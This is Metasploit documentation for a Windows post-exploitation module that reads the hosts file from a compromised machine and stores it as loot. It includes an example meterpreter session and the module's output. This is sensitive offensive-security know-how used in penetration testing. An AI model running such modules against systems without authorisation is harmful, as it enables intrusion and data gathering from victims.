documentation/modules/post/windows/gather/enum_hostfile.md
This module reads the hosts file on Windows systems, located at:
C:\\Windows\\System32\\drivers\\etc\\hosts. Any content lines are printed
and the file is stored in loot.
use post/windows/gather/enum_hostfileset session [#]runmsf post(windows/gather/enum_hostfile) > use post/windows/gather/enum_hostfile
msf post(windows/gather/enum_hostfile) > sessions -i 5
[*] Starting interaction with 5...
meterpreter > sysinfo
Computer : MSEDGEWIN10
OS : Windows 10 (10.0 Build 16299).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 5...
msf post(windows/gather/enum_hostfile) > set session 5
session => 5
msf post(windows/gather/enum_hostfile) > run
Found entries:
[+] 1.1.1.1 supersecret
[*] Hosts file saved: /root/.msf4/loot/20201011174103_default_192.168.2.92_hosts.confige_103430.txt
[*] Post module execution completed